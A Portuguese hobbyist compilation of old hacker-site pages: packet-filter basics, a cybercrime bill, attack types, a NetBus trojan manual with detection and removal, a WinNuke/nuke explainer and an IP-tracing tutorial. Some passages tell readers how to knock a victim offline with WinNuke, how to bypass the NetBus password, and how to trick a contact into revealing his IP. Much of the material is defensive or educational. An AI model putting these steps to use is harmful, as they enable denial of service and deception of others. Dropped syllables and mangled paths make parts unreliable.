aviso: É extremamente recomendado que se tenha conhecimentos de tcp/ip, endereçamento ip, portas de conexão e pacotes tcp/udp/icmp, antes de prosseguir na leitura deste tópico.

- [ a filtragem de pacotes ] -

essa é a maneira mais simples de se construir um firewall. geralmente utilizadas em roteadores, as listas de acesso têm uma ótima relação custo x benefício: os roteadores já possuem estas facilidades, basta sentar e aprender a configurá-los; a filtragem é bem eficiente, invisível e rápida (se o roteador for de boa qualidade).

mas então, o que vamos configurar? os roteadores (que toda rede com conexão à internet possui) têm um papel muito simples: interligam duas redes e fazem o transporte de pacotes de informação de uma rede para outra, conforme sua necessidade. mas muitos destes roteadores, além de identificar o destino do pacote e encaminhá-lo na direção certa, eles checam ainda: a direção dos pacotes; de onde veio e para onde vai (rede interna e internet); endereço de origem e destino; tipo de pacote; portas de conexão; e flags do pacote.

estes pontos de conexão da internet com a rede interna podem receber uma série de regras para avaliar a informação corrente. são as listas de acesso que definem o que deve e o que não deve passar por este ponto de conexão. elas são mais ou menos assim:

< cellspacing="2" cellpadding="3" bgcolor="#000000" border="0">
# regra s/ñ protocolo origem destino opções


a opção "sim/não" equivale a "permitir a passagem do pacote/negar a passagem do pacote" e em "opções" definiremos os flags do pacote e portas de destino. claro, esta é uma generalização das sintaxes mais comuns, o que nos permite ter uma idéia geral de como isto pode ser configurado. consulte o manual do seu roteador para checar a sintaxe correta das listas de acesso. algumas coisas podem estar fora de ordem, portanto, é melhor entender o conceito e não tentar copiar...

vamos supor que nós queiramos impedir o acesso à nossa rede interna para que não seja possível uma conexão telnet (pacotes tcps da porta 23) com nossos hosts (pelo menos as conexões vindas da internet). este filtro, logicamente, deveria ser colocado na interface de entrada dos pacotes externos na rede interna. pela sintaxe do exemplo, ficaria assim:

< cellspacing="2" cellpadding="3" bgcolor="#000000" border="0"> # regra s/ñ protocolo origem destino opções
#1 ñ tcp qualquer interno porta 23


ou seja, negar todos os pacotes tcp para a porta 23 vindos da internet em direção à qualquer máquina da rede interna. isto funciona muito bem! mas vamos supor que, em algum canto da internet, exista um funcionário da minha empresa que precise abrir sessões telnet. ele vai ficar meio chateado conosco... ;-) então poderíamos fazer o seguinte: procurar saber *exatamente* de onde ele está tentando se conectar e permitir a entrada dos seus pacotes.

< cellspacing="2" cellpadding="3" bgcolor="#000000" border="0"> # regra s/ñ protocolo origem destino opções
#1 ñ tcp qualquer interno porta 23
#2 s tcp 200.17.21.8 interno porta 23


dessa forma, os pacotes vindo de 200.17.21.8 (isto é apenas um exemplo!) poderiam passar pelo roteador. É uma brecha na segurança? sem dúvida! mas cabe a este funcionário tomar conta do seu computador, impedindo que ataques se originem debaixo do seu nariz...

um detalhe: precisamos criar uma regra nova para cada restrição ou permissão? não, necessariamente. se duas restrições não forem excludentes (o que nÃo é o caso do exemplo acima) elas podem fazer parte da mesma regra (i.e., terem o mesmo número). mas, mais uma vez, é melhor consultar o manual do seu roteador para certificar-se de "como" ele dá prioridade às regras.

outro detalhe: baseado nesta ordem, podemos definir uma política para a segurança da rede. a primeira opção seria liberar tudo e negar os serviços perigosos; a segunda seria negar tudo e liberar os serviços necessários. sem sombra de dúvidas, a segunda é mais segura, entretanto, os funcionários da rede interna podem precisar acessar livremente à internet como forma de trabalho, e a manutenção desta lista seria tão trabalhosa, visto a proliferação de programas internet que, em pouco tempo estaríamos completamente perdidos em um emaranhado de regras sem sentido...

Leis Digitais...

dos princípios que regulam a prestação de serviço por redes de computadores.

artigo primeiro- o acesso, o processamento e a disseminação de informações através das redes de computadores devem estar a serviço do cidadão e da sociedade, respeitados os critérios de garantia dos direitos individuais e coletivos e de privacidade e segurança de pessoas físicas e jurídicas e da garantia de acesso às informações disseminadas pelos serviços de rede.

artigo segundo- É livre a estruturação e o funcionamento das redes de computadores e seus serviços, ressalvadas disposições específicas reguladas em lei.


capÍtulo 2
do uso de informações disponíveis em computadores ou redes de computadores.

artigo terceiro- para fins desta lei, entende-se por informações privadas aquelas relativas à pessoa física ou jurídica identificada ou identificável.

parágrafo Único - É identificável a pessoa cuja individualização não envolva custos ou prazos desproporcionados.

artigo quarto- ninguém será obrigado a fornecer informações sobre sua pessoa ou de terceiros, salvo nos casos previstos em lei.

artigo qu- a coleta, o processamento e a distribuição, com finalidades comerciais, de informações privadas ficam sujeitas à prévia aquiescência da pessoa a que se referem, que poderá ser tornada sem efeito a qualquer momento, ressalvando-se o pagamento de indenizações a terceiros, quando couberem.

§1. a toda pessoa cadastrada dar-se-á conhecimento das informações privadas armazenadas e das retrospectivas fontes.

§ 2. fica assegurado o direito à retificação de qualquer informação privada incorreta.

§ 3. salvo a disposição legal ou determinação judicial em contrário, nenhuma informação privada será mantida à revelia da pessoa a que se refere ou além do tempo previsto para a sua vaidade.

§ 4. qualquer pessoa, física ou jurídica, tem o direito de interpelar o proprietário de rede de computadores ou o provedor de serviço para saber se mantém as informações a seu respeito, e o respectivo teor.

artigo sexto- os serviços de informações ou de acesso a bancos de dados não distribuirão informações privadas referentes, direta ou indiretamente, a origem racial, opinião pública, filosófica, religiosa ou de orientação sexual, e de filiação a qualquer entidade, pública ou privada, salvo autorização expressa do interessado.

artigo sétimo- o acesso de terceiros, não autorizados pelos respectivos interessados, à informações privadas mantidas em redes de computadores dependerá de prévia autorização judicial.


capÍtulo 3
dos crimes de informática.

seção i – dano a dado ou programa de computador.

artigo oitavo- apagar, destruir, modificar ou de qualquer forma inutilizar, total ou parcialmente, dado ou programa de computador, de forma indevida ou não autorizada.

pena: detenção, de um a três anos e multa.

parágrafo único = se o crime é cometido:

i – contra o interesse da união, estado, distrito federal, município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

ii – com considerável prejuízo da vítima;

iii- com intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

iv – com abuso de confiança;

v – por motivo fútil;

vi - com o uso indevido de senha ou processo de identificação de terceiro; ou

vii – com a utilização de qualquer outro meio fraudulento.

pena: detenção, de dois a quatro anos e multa.

seção ii – acesso indevido ou não autorizado

artigo nono- obter acesso, indevido ou não autorizado, a computador ou rede de computadores.

pena: detenção, de seis meses a um ano e multa.

parágrafo primeiro: na mesma pena incorre quem, sem autorização ou indevidamente, obtém, mantém ou fornece a terceiro qualquer meio de identificação ou acesso a computador ou rede de computadores.

parágrafo segundo - se o crime é cometido;

i – com acesso a computador ou rede de computadores da união, estado, distrito federal, município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

ii – com o considerável prejuízo para a vítima;

iii – com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

i

v – por motivo fútil;

vi – com o uso indevido de senha ou processo de identificação de terceiro; ou

vii – com a utilização de qualquer outro meio fraudulento.

pena: detenção, de um a dois anos e multa.

seção iii – ação de senha ou mecanismo de acesso a programa de computador ou dados.

artigo décimo- apagar, destruir, ar, ou de qualquer forma inutilizar, senha ou qualquer outro mecanismo de acesso a computador, programa de computador ou dados, de forma indevida ou não autorizada.

pena: detenção, de um a dois anos e multa.

seção iv - obtenção indevida ou não autorizada de dado ou instrução de computador.

artigo décimo primeiro- obter, manter ou fornecer, sem autorização ou indevidamente, dado ou instrução de computador.

pena: detenção, de três meses a um ano e multa.

parágrafo Único - se o crime é cometido:

i – com acesso a computador ou rede de computadores da união, estado, distrito federal, município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

ii – com considerável prejuízo para a vítima;

iii – com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

iv – com abuso de confiança;

v – por motivo fútil;

vi – com o uso indevido de senha ou processo de identificação de terceiro; ou

vii – com a utilização de qualquer outro meio fraudulento.

pena: detenção, de um a dois anos e multa.

seção v – violação de segredo armazenado em computador, meio magnético, de natureza magnética, óptica ou similar

artigo décimo segundo- obter segredos, de industria, ou comércio, ou informações pessoais armazenadas em computador, rede de computadores, meio eletrônico de natureza magnética, óptica ou similar, de forma indevida ou não autorizada.

pena: detenção, de um a três anos e multa.

seção vi – criação, desenvolvimento ou inserção em computador de dados ou programa de computador com fins nocivos

artigo décimo terceiro- criar, desenvolver ou inserir, dado ou programa em computador ou rede de computadores, de forma indevida ou não autorizada, com a finalidade de apagar, destruir, inutilizar ou modificar dado ou programa de computador ou de rede de computadores, dificultar ou impossibilitar, total ou parcialmente, a utilização de computador ou rede de computadores.

pena: reclusão, de um a três anos e multa.

parágrafo Único - se o crime é cometido:

i – contra o interesse da união, estado, distrito federal, município, órgão ou entidade da administração direta ou indireta ou de empresa concessionária de serviços públicos;

ii – com considerável prejuízo para a vítima;

iii – com o intuito de lucro ou vantagem de qualquer espécie, própria ou de terceiro;

iv – com abuso de confiança;

v – por motivo fútil;

vi – com o uso indevido de senha ou processo de identificação de terceiro; ou

vii – com a utilização de qualquer outro meio fraudulento.

pena: reclusão, de dois a seis anos e multa.

seção vii - veiculação de pornografia através de rede de computadores.

artigo décimo quarto- oferecer serviço ou informação de caráter pornográfico, em rede de computadores, sem exibir, previamente, de forma facilmente visível e destacada, aviso sobre a natureza, indicando o seu conteúdo e a inadequação para a criança ou adolescentes.

pena: detenção, de um a três anos e multa.


capÍtulo 4
das disposições finais.

artigo décimo qu- se qualquer dos crimes previstos nesta lei é praticado no exercício de atividade profissional ou funcional, a pena é aumentada de um sexto até a metade.

artigo décimo sexto- nos crimes definidos nesta lei somente se procede mediante representação do ofendido, salvo se cometidos contra o interesse da união, estado, distrito federal, município, órgão ou entidade da administração direta ou indireta, empresa concessionária de serviços públicos, fundações instituídas ou mantidas pelo poder público, serviços sociais autônomos, instituições financeiras ou empresas que explorem ramo de atividade controlada pelo poder público, casos em que a ação é pública incondicionada.

artigo décimo sétimo- esta lei regula os crimes relativos à informática sem prejuízo das demais cominações previstas em outros diplomas legais.

artigo décimo oitavo- esta lei entra em vigor 30 (trinta) dias a contar da data de sua publicação.



alguns crimes digitais

ação: enviar mensagem alarmante, como a da existência de um novo vírus, e recomendar a retransmissão do arquivo para o maior número de pessoas possível, causando sobrecargas em sistemas como o do icq.

pena: detenção de 3 meses a 1 ano ou multa (correspondente ao art.146; constrangimento ilegal)



ação: enviar e-mail com ameaça de agressão.

pena: detenção de 1 a 6 meses ou multa (correspondente ao art.147; ameaça)



ação: abrir e-mail alheio sem autorização.

pena: detenção de 1 a 6 meses ou multa (correspondente ao art.151; violação de correspondência)



ação: invadir um computador e apagar os dados ou enviar um vírus pela internet

pena: detenção de 1 a 6 meses ou multa (correspondente ao art.163; dano)



ação: fazer compras na rede com números falsos de cartão de crédito ou outro

documento.

pena: reclusão de 1 a 5 meses ou multa (correspondente ao art.171; estelionato)



ação: colocar fotos de sexo explícito ou pedofilia em uma home page.

pena: detenção de 6 meses a 2 anos ou multa (correspondente ao art.234; escrito ou objeto obsceno)



ação: montar sites com receitas de bombas, ensinamentos de como destruir carros e fazer ligações de celulares sem pagar.

pena: detenção de 3 meses a 6 meses ou multa (correspondente ao art.286; incitação ao crime)

v – com abuso de confiança;

Pontos Fracos...

os pontos fracos

< cellspacing="0" cellpadding="0" width="100%" border="0">

existem inúmeras categorias de ataque a serviços internet, explorando falhas de software, hardware e principalmente burlando esquemas de segurança ineficazes em nossas políticas operacionais. por exemplo:

sniffer: captura informações que trafegam pela rede, como logins e senhas em texto não-criptografado, podendo ser utilizadas futuramente por um invasor.

spoof: baseia-se na confiança da negociação entre servidores, que acreditam na veracidade do endereço de origem daquela ordem ou informação, e podem sofrer um ataque por mensagens na qual a origem é "disfarçada" como sendo de alguém de confiança.

mudanças de rota: um ataque desta natureza pode fazer com que toda a informação de um dado servidor seja obrigada a passar por um espião antes de seguir seu caminho, ou simplesmente sejam redirecionadas para lugar nenhum, causando a "queda" do serviço.

trojan horse: um programa pode ser inadvertidamente instalado em um servidor, o qual permitiria uma invasão por alguma porta ou "brecha" propositadamente implantada neste programa.

replay: alguma ação, comandos ou seqüência de eventos podem ser observados durante um processo de autenticação, e repetidas, posteriormente, por um invasor para obter acesso a estes sistemas.

vírus: À primeira vista pode parecer um simples problema de usuários domésticos, mas os vírus, se não forem devidamente eliminados e controlados, podem causar, direta e indiretamente, vários problemas em uma rede, desde a impossibilidade de comunicação interna, até a interrupção dos serviços vitais.

adulteração: a falta de um controle de conteúdo eficiente pode fazer com que uma informação seja adulterada durante sua transmissão, pondo em risco a comunicação entre dois sistemas.

alguns produtos, tais como servidores ou até mesmo sistemas operacionais completos, vêm configurados "da fábrica" de uma forma muito pouco segura, e é necessário conhecer todos os aspectos da nova ferramenta instalada no seu sistema para que ela seja corretamente utilizada.

programas como servidores de mail, ftp, web ou configurações do sistema, como permissões de arquivos, aplicativos desnecessários (tal como um lpd em um servidor exclusivo de web) devem ser completamente vistoriados antes da sua instalação, procurando se informar sobre suas capacidades de auditoria e sobre seus recursos de segurança.

pode-se ainda, caso o sistema em questão seja inseguro e necessário, cogitar produtos que possam implementar esta segurança à parte, e dar a mesma importância a eles, instalando-os simultaneamente, e nunca "deixar para depois", pois se alguém detectar uma falha no seu sistema, ela será explorada imediatamente!

e o mais importante: estas configurações padrões, ou os erros mais comuns durante as instalações, são os primeiros alvos dos hackers e, em pouquíssimo tempo seu sistema poderá ser completamente comprometido por pura falta de atenção.

Oque é ''Hacker''

o que é ser um hacker?

< cellspacing="0" cellpadding="0" width="100%" border="0">
primeiramente, vamos identificar o termo: hacker, originalmente, designava qualquer pessoa que fosse extremamente especializada em uma determinada área. qualquer fera em qualquer assunto, poderia ser considerado um hacker. por exemplo: sua tia matilde pode ser um hacker da culinária, ou seu mecânico predileto pode ser um hacker de automóveis... somente com a ajuda do cinema americado, é que o termo hacker de computador passou a ser utilizado largamente, mas nem por isso perdeu sua identidade. quem não se lembra do filme war games, onde um garoto, brincando com seu modem, acessa (por acidente!) o norad, simplesmente o computador responsável pela segurança de guerra dos estados unidos da américa?

evidentemente, as pesquisas e técnicas realizadas pelo garoto para descobrir a senha do suposto jogo (ele não sabia em que estava se metendo) é digna de um hacker. pelo menos dos hackers daquela época...

seguindo a lógica americana, que produz "filmes propagandas" que induzem os telespectadores a desejarem ser o que o filme mostra - assim como topgun foi uma propaganda à marinha, e cortina de fogo uma propaganda para o corpo de bombeiros, com war games aconteceu a mesma coisa: vários adolescentes que tinham um modem começaram a sonhar com os controles da terceira guerra mundial em suas mãos, ou mais especificamente em sua escrivaninha, no quarto.

isso não quer dizer que este filme foi a base de lançamento de atitudes hacker por todo o mundo, mas foi um dos responsáveis pela dilatação desses pensamentos. o mercado americano (sim, mais uma vez estamos girando em torno dos estados unidos - tem outro jeito?) abarrotou as prateleiras de livros como cyberpunk, e mais tarde, qualquer nota sobre invasão de sistemas ou crimes relacionados a computadores ganhavam um espaço cada vez maior na mídia. existiam hackers de verdade sim! eram pessoas que trabalhavam em projetos de computadores e técnicos altamente especializados. mas também existiam aqueles garotos, que após descobrirem que invadir um sistema ou lançar um missil não era tão fácil quanto ver um filme ou ler um livro, insistiram e estudaram muito (as maiores virtudes dos hackers são a força de vontade e a dedicação aos estudos), conseguiram muitas proezas e hoje, grande parte trabalha na área de segurança de computadores. o resto está preso.

a grande maioria dos hackers é jovem. dizem que é uma fase da vida de cada micreiro. e além do mais o jovem tem muito mais tempo para estudar e aprender. depois que cresce, precisa se preocupar com a vida de verdade e passa a trabalhar (geralmente com computadores), deixando de invadir sistemas ou fazer coisas piores. os poucos que continuam a praticar atos de hacker são espiões industriais ou especialistas em segurança, e passam a fazer um jogo de gente grande, onde a pessoa vai precisar deter de verdade os invasores perigosos (os espiões), e estes se protegerem do risco de invadir sistemas (e da polícia).

a filosofia é a seguinte: hackers existem, são e sempre serão poucos! quando (e se) uma "informação de hacker" chegar às suas mãos, com certeza é porque ela está difundida demais, e não será útil para mais nada. mais um nível que os hackers sobem e mais um que você sobe atrás deles. para se chegar ao topo, você precisa se esforçar. aí entra a velha questão: será que o esforço vale a pena? para que você entraria em um sistema?

conhecemos (de perto) hackers (ou pretendentes a) que passam a noite inteira tentando quebrar um código, conseguir acessos não autorizados, burlar esquemas de segurança e, às vezes, estragar sistemas de computação. agora, se você quer ser assim, diga-nos: você queimaria seus neurônios durante várias madrugadas para tirar um sistema do ar? um sistema que nunca lhe fez mal, está lá apenas para servir pessoas que também não fizeram nada contra você? imagina, o responsável pelo sistema, que precisa do salário da empresa onde trabalha para alimentar seus filhos, pagar o aluguel da casa? É esse cara que você, se metendo a sabichão, vai prejudicar? qual é o problema do sistema do cara estar com falhas? quer fazer um favor? avisa ao responsável onde está o problema e assunto resolvido! quem sabe você não começa a dar consultoria nesse tipo de assunto e ganha um bom dinheiro...

se você acha que é emplogante invadir sistemas, que dá a maior adrenalina, coisa e tal, experimente o bung jump, ou então dê uma paquerada na noiva daquele troglodita do bloco b, etc... além do mais, já viu o sol que tá fazendo lá fora? larga esse computador e vai curtir a vida, cara!

na paz...

Manual do NETBUS

valeu killer bios paiper !

< cellspacing="0" cellpadding="0" width="100%" border="0">
1. introdução= semelhante ao back orifice, o netbus é uma ferramenta que pode ser utilizada como um sistema de administração remota para os ambientes operacionais windows 95, windows 98 e windows nt.

É composto por um programa que atua como servidor e um programa que atua como cliente, permitindo conexões remotas mesmo através da internet, utilizando-se do protocolo tcp.

por suas inúmeras características e facilidades, o netbus passou a ser utilizado principalmente por hackers que pretendem manter controle sobre as máquinas de suas vitimas, sem serem notados/detectados.

2. comprometimento= o servidor netbus é auto-instalável indicando que na primeirá ução a maquina passará a ser comprometida.

o netbus permite um amplo controle sobre o servidor, apresentando inúmeras características das quais se destacam: - auto-instalável - auto utável (com o boot do windows) - permite iniciar/utar qualquer aplicativo - permite fechar/terminar qualquer aplicativo - permite rebootar o servidor - pode desconectar usuários - permite enviar caracteres para aplicativos ativos - permite capturar o que esta sendo digitado no computador servidor - permite capturar a tela (screenshot) do computador servidor - retorna informações gerais sobre o computador - permite realizar upload de arquivos para o servidor - permite realizar download e deleções de qualquer arquivo do servidor - permite capturar o som de microfones instalados no servidor - possui esquemas de proteção e validação de acessos através de senhas - não aparece na task list do windows além disso, o netbus faz uso de senhas para permitir o controle de acessos ao servidor netbus. a string que contém a senha que o cliente envia para o servidor é semelhante à linha abaixo: password;0;my_password

no entanto, detectou-se a presença de um backdoor no netbus que permite a qualquer cliente estabelecer conexão com o servidor sem a necessidade de se utilizar uma senha. o cliente pode conectar-se sem autenticação bastando substituir o valor do segundo parâmetro da string de conexão acima de "0" para "1".

3. detecção= por default, o servidor netbus chama-se patch.exe. no entanto pode perfeitamente ser renomeado para qualquer outro nome. o netbus utiliza tcp para estabelecer o envio/recebimento de pacotes e dados, permanecendo ativo nas portas 12345 e 12346 aguardando por conexões de clientes. como primeiro passo, é possível verificar se essas portas estão em uso por algum serviço. para tanto utiliza-se o comando 'netstat' conforme exemplo abaixo: c:>netstat -an | find "1234" tcp 127.0.0.1:12345 0.0.0.0:0 listening em seguida, é possível identificar que serviço esta ativo na porta apresentada pelo netstat. para tanto utiliza-se o comando telnet, conforme exemplo abaixo: c:>telnet 127.0.0.1 12345 se o netbus estiver instalado e aguardando por conexões nesta porta, a seqüência abaixo irá aparecer na janela do telnet: 'netbus 1.53' ou: 'netbus 1.60' alem desse procedimento, é possível examinar o registro do windows a procura de algumas chaves que podem ser criadas pelo programa quando de sua instalação. ute o 'regedit' e faca uma busca pelas chaves abaixo: hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun[nome do netbus] hkey_current_userpatchsettingsserverpwd

a primeirá chave indica que o netbus esta configurado para ser inicializado automaticamente a cada boot do sistema. já a segunda chave indica qual a senha (em formato texto puro) que esta sendo utilizada para validar conexões.

4. removendo o netbus= indica-se dois procedimentos básicos e simples para remoção do netbus: 1) fazer uso de uma opção do servidor netbus que automaticamente deleta o utável, conforme exemplo abaixo: c:>nome_do_netbus_server.exe /remove 2) utilizar o cliente do netbus para fazer essa remoção. basta conectar-se ao servidor (podendo ser localhost), selecionar "server admin" e em seguida "remove server". no entanto, notamos que em alguns casos as duas opções falharam ao limpar o registro do windows. logo, indicamos que o processo de remoção seja feito manualmente deletando-se o utável e limpando-se o registro eliminando-se as chaves criadas pelo netbus.

O que é um NUKE!

Oq é Nuke!
--------------------------------------------------------------------------------



o que é nuke?

nuke é o nome atribuído a programas que finalizam prematuramente com uma conexão tcp através do envio de pacotes icmp com mensagens de erro. tais pacotes podem ser direcionadas para o servidor (server side nuke) ou para o cliente (client side nuke). tais programas tem a propriedade de terminar com a conexão fazendo com que o cliente ou o servidor sejam enganados por uma mensagem de erro que normalmente indicaria um problema de conexão entre os dois. o efeito de tal programa para a vitima e' a desconexão do seu servidor, geralmente sem efeitos colaterais. num exemplo pratico seria como se você fosse desconectado do servidor irc.


história --- acredito que o primeiro programa de nuke foi o nuke.c, para unix, seu autor se chamava satanic mechanic. este programa enviava pacotes icmp com mensagens de erro na porta 23 do servidor, finalizando assim com conexões telnet. com a utilização de firewalls, nukes direcionados para o servidor passaram a não ser mais eficientes. passou-se então a "nukar" o host do cliente, no entanto, o fato do cliente geralmente não possuir uma porta fixa para estabelecer a conexão com o servidor dificulta a operação. a solução para isso foi o desenvolvimento de programas que varrem seqüencialmente todas as portas do cliente aonde pode existir uma conexão (portas de 1024 ate' 65535), bombardeando elas com mensagens de erro até que se encontre a porta aonde se deu a conexão com o servidor. o numero de programas de "nuking" para sistemas unix supera em muito os equivalentes para windows, alem de geralmente serem muito mais eficientes devido as limitações do winsock. alguns programas de nuke desenvolvidos para o winsock 2.2beta já estão sendo lançados, estes sim muito mais poderosos do que seus antecessores para a plataforma microsoft. entre esses posso citar o click4 (by rhad), que realmente (infelizmente) é muito poderoso. um dos primeiros programas de nuke para a plataforma windows (e um dos mais populares) foi o wnuke. É um aplicativo em 16 bits que utiliza recursos do trumpet winsock para enviar os pacotes. foram lançadas diversas versões desse programa, cada uma implementando mais recursos como controle do tipo de mensagem icmp enviada e delay entre o envio dos pacotes, de forma que o programa poderia ser utilizado por pessoas que não dispõe de uma conexão de alta velocidade com a internet .

como utilizar um nuke ? bem... você realmente não deveria utilizar o nuke, essa sessão aqui pretende explicar o funcionamento de um programa de nuke, portanto não vou citar exemplos "práticos" de como nukar, mas sim as definições básicas. basicamente todos os programas de nuke utilizam o mesmo principio: 1 - definir o alvo dos pacotes (cliente ou servidor) 2 - definir o tipo de mensagem de erro enviada (opcional) 3 definir o host do cliente 4 - definir o host do servidor 5 - definir as portas a serem nukadas no cliente 6 - definir as portas a serem nukadas no servidor 7 - definir o intervalo (delay) entre cada pacote enviado (opcional) uma vez determinados esses parâmetros o programa inicia o envio de pacotes de erro. quanto mais rapido foi a sua conexão com a internet menor o intervalo ente cada pacote, e mais rápido a vitima vai ser atingida. no lugar da porta do servidor, o mais obvio é começar a varredura a partir da porta 6667, que é a porta de conexão default para a maioria dos servidor irc. o tipo de mensagem de erro enviada pode ser determinada preferencialmente pelo tipo de alvo. se o alvo for uma maquina unix, mensagens de 'host unreachable' demonstram maior eficiência. no caso de maquina windows, "protocol unreacheble" demonstrou ser mais eficiente.

oob bug (bug da porta 139) diversos programas utilizam esse bug para travar sistemas windows, gerando um "denial of service" através do envio de um pacote oob (out of band) marcado como urgente para portas especificas, como por exemplo a porta 139. sistemas windows nt sem o hotfix oobfix instalado ainda são afetados em duas outras portas, que prefiro não divulgar para impedir o uso mal intencionado dessa informação. apesar de serem chamados de nuke (winnuke, wnuke32, etc...) na verdade esses programas tem um funcionamento totalmente diferente, eles simplesmente se aproveitam de um defeito no sistema. conforme descrito em seções anteriores o funcionamento de programas de nuke é diferente. os efeitos de um ataque de oob são facilmente perceptíveis. todo o sistema de rede do windows entra em pânico, e geralmente é necessária a reinicialização do sistema para que a situação seja normalizada. felizmente já existem diversos patches disponíveis para resolver esse problema, para a plataforma windows nt, sugiro o ftp://198.105.232.37/fixes/, site nativo da própria microsoft aonde estão todos os service packs e hotfixes disponíveis. caso você já tenha aplicado o service pack 3, o diretório aonde esta o hotfix para o bug de oob é: /fixes/usa/nt40/hotfixes-postsp3/oob-fix para o windows 95, existem diversas soluções, a mais simples de todas é um arquivo de registro que simplesmente fecha a porta 139. essa solução não é a oficial da microsoft e na minha opinião deve ser evitada, dando preferencia para o patch disponibilizado em http://www.microsoft.com/kb/articles/q168/7/47.htm

pinga bom inicialmente vale explicar que não estamos falando de ctcp ping, e sim do programa ping (packet internet groper) que verifica se um endereço ip existe e esta respondendo. o uso mal intencionado desse programa, a partir de uma conexão rápida com a rede, faz com que a vitima caia num lag que provavelmente o levara a desconexão por ping timeout, devido a quantidade de pacotes recebidos superar em muito a sua capacidade de devolver os mesmos.

winnuke: um bug no subsistema de rede do windows 3.x, 95 e nt permite que usuários externos possam desativar totalmente o seu acesso à rede, simplesmente enviando informações marcadas como urgentes (out-of-band;oob) a determinadas portas do seu computador (sendo que a mais usual é a 139). esse ataque de denial-of-service desabilita totalmente a comunicação tcp/ip de sua máquina, retornando ao normal apenas após o reboot da sua máquina. existem proteções disponíveis que simplesmente fecham a porta 139 - isso não é eficiente, pois o ataque oob pode ser utado em outras portas menos usuais também. da mesma forma, os detetores de nuke que se destinam a identificar a origem dos ataques oob também não tem eficiência máxima porque limitam - se a ouvir a porta 139. além disso, eles não deveriam se chamar detetores de `nuke`, uma vez que o ataque que eles detectam não constitui um nuke canônico, mas apenas um exploit de um bug do microsoft winsock.

nukando ips: pra nukar um ip, é muito simples, basta fazer o download de algum nuker bom, ou por exemplo o download do wingenocide que simplesmente come memória ram do computador da vítima. não se preocupe pois não vamos ficar falando a parte teórica de como funciona nuke, basta você saber bem por cima de que há uma porta 139 que tem um bug e essa porta que você vai nukar, retirando a pessoa da internet (desconectando-a). se você esta interessado em fazer o download de um programa de nuke sugiro que você pegue um programa chamado winnuke, que já ganhou fama por ser um programa muito bom. usando este programa basta você pegar o ip da vítima, sendo por qualquer modo que ensinamos acima, ou por outro método e colocar este ip no campo indicado no programa, depois se você apertar o botão nuke! e esperar aparecer a mensagem de que o nuke foi enviado.

rastreando o provedor do ip: se você não quer nukar, por qualquer motivo, sendo por ter medo dele ou por não querer mesmo, ou se você quer apenas dar um susto na vítima do ip, esta é uma solução boa, pois com este programa você pode rastrear o provedor do dono do ip. para fazer isto basta você fazer o download de um programa scan. aqui você pode fazer o download do ipscan que é o mais simples dos scans, mas se você preferir vá até nossa seção de download copie o cyberkit ou outro qualquer. usando o ipscan, tudo que você tem que fazer é colocar o ip da pessoa no campo indicado e apertar start que logo irá aparecer o provedor da pessoa em baixo.

protegendo de nukes: 1. faça o download do patch. ute o programa e extraia no diretório windowssystem 2. feito isso, dê iniciar/utar. lá coloque: c:windowssystempatch.bat 3. uma tela do prompt do dos vai aparecer. o programa vai renomear o arquivo. aí é só reiniciar o computador e você nunca mais será nukado! obs.: se você possuir uma rede em casa, nÃo use este patch! o arquivo que será renomeado (vnbt.386) é necessário para a rede!

Tirar TROIA!

os cavalos de tróia digitais

< cellspacing="0" cellpadding="0" width="100%" border="0">
você conhece aquela história sobre o presente de grego (literalmente), um belo cavalo de madeira, que escondia centenas de soldados prontos para acabar com a paz dos troianos, certo?

na era da informática não mudou muito, a não ser pelo fato de que os cavalos de madeira são feitos agora de bytes. os chamados "programas cavalo-de-tróia" são, aparentemente, programas comuns, muitas vezes conhecidos, algumas vezes novos, mas que semprem fazem algo mais do que anunciam.

seja capturar senhas, causar estragos ou tirar proveito do usuário de alguma forma não documentada. tá complicado? imagina o seguinte: toda vez que você se conecta ao seu provedor, ele uta um programa chamado "login", que lhe pergunta seu nome e sua senha. imagina se alguém faz um programa muito parecido com o "login" mas que, ao invés de lhe conectar no provedor, ele faz uma cópia da sua senha em um arquivo escondido, onde apenas o autor do programa ado sabe o local. em alguns dias ele resgata este arquivo e terá nas mãos a senha de quase todos os usuários do seu provedor.

algumas pessoas têm confundido cavalos de tróia com backdoors. os conceitos são parecidos, mas existem diferenças fundamentais. por exemplo: o back orifice e o netbus são cavalos de tróia, pois não possuem nenhuma finalidade prática para a vítima. já o ickiller, que derruba usuários do icq possui uma backdoor, pois há uma porta dos fundos que permite certas invasões.

Rastreando IP'S

rastreando ips
rastreando ip (tutorial)

1 parte

bom, issu daí foi uma busca que eu fiz em vários lugares, e montei um tutorial so bem explicado, pra quem ta começando isso vai ajudar bastante...se alguém quiser copiar esse tutorial botem so os devidos créditos...e é isso ai....

pra começa hacker num é so invadi pc de outro, invadi msn, orkut e etc...hacker é conhecimento acima de tdu...se tem ke ter cabeça, num adianta xega aqui e olha os tutoriais de invadi pc de outro, pq no final o pc é fudido é o seu

entao primeiro de tdu vmu sbe o que é ip ne...

o endereço ip, de forma genérica, pode ser considerado como um conjunto de números que representa o local de um determinado equipamento (normalmente computadores) em uma rede privada ou pública.
para um melhor uso dos endereços de equipamentos em rede pelas pessoas, utiliza-se a forma de endereços de domínio, tal como "www.orkut.com". cada endereço de domínio é convertido em um endereço ip pelo dns. este processo de conversão é conhecido como resolução de nomes de domínio.
cada número do ip identifica uma informação sobre o usuários, assim como localidade.

no caso do brasil por padrão, o ip inicia com os números 200 ou 201, mas os outros seqüentes podem mudar conforme o tempo, pois isso evita alguns ataques por hackers ou script kiddies.

ter uma lista com a numeração atualizada indicando cada número pra estado ou cidade é meio difícil, então pra encontrar um salto final é preciso ter certa habilidade
com o assunto e muito esforço pra conseguir dados que elucidam a localidade. 30 set (4 dias atrás) kakashi.ex3­­­
parte 2
rastreando ip (tutorial)

2 parte
como descobrir ip

existem dois jeitos pra vc conseguir o ip de uma pessoa plu msn, se a pessoa for seu amigo e burro ao não entender essas coisas e ele tiver o msn live é so vc pdir pra ele digitar isso na conversação sua com ele
(!ip)
obs: tem ke ta tdu junto e o ip tem que ser maiúsculo...
